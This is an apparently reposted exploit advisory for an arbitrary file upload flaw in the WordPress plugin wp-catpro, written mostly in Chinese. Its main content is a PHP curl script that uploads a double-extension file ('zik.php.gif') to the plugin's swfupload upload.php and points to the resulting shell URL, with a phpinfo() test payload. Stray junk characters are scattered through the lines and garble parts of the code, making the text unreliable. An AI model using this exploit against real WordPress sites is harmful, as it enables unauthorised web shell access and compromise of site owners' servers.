WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
% c" q3 g, N" F/ R. X' D8 I- G/ P3 b#-----------------------------------------------------------------------
! ?; U  U( H# I- F+ d) h4 L% Z
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
  [" F6 I5 v1 k下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
/ X, g% b: ^  |####

+ V* d3 Q) E8 _' U# v#=> Exploit 信息:
- u) m; p4 s! X------------------
3 h. ^, t$ w. S1 l' G5 p# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
; B9 k" Y  w# L+ @# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
! ^2 Y; {$ }$ g5 q3 J2 F' Q# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
1 z, J* `/ K3 M# U- }( t$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
. y( ?7 M( I7 \, Parray('Filedata'=>"@$uploadfile",
% N/ d" [, ?# o+ a/ q) t'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
# H( T) m( R  M6 c6 h+ `7 @5 R  ^$postResult = curl_exec($ch);
8 {) n% [. f1 s" {& acurl_close($ch);

+ B/ X- N: I, ~; U" W# a2 C% uprint "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
; r9 w9 }( k, A+ ]7 l<?php
phpinfo();
7 o% ]% t; B. c0 G# R; Y?>